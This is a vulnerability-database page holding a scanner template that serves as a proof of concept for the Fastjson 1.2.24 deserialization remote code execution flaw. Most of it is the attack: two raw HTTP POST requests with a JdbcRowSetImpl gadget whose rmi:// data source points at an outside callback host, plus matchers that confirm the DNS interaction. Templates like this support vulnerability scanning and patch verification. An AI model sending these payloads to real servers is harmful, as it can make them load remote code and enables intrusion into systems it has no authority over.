fastjson-1-2-24-rce: Fastjson 1.2.24 - Remote Code Execution

2025-08-01 fastjson PoC Public

Description

Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.

PoC

id: fastjson-1-2-24-rce

info:
  name: Fastjson 1.2.24 - Remote Code Execution
  author: zh
  severity: critical
  description: Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77,CWE-502
  metadata:
    max-request: 2
  tags: fastjson,rce,deserialization,oast,vulhub,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Internal Server Error"
          - "500"
# digest: 4b0a00483046022100926f10cb8aa0fcc2eb87e48440e3dafb7a321c8542835cb19b6d37255ab15def022100906444e4b44e5298c2ee45a0284196d0243a1ae2074da6d30b0c360c1a806c4e:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities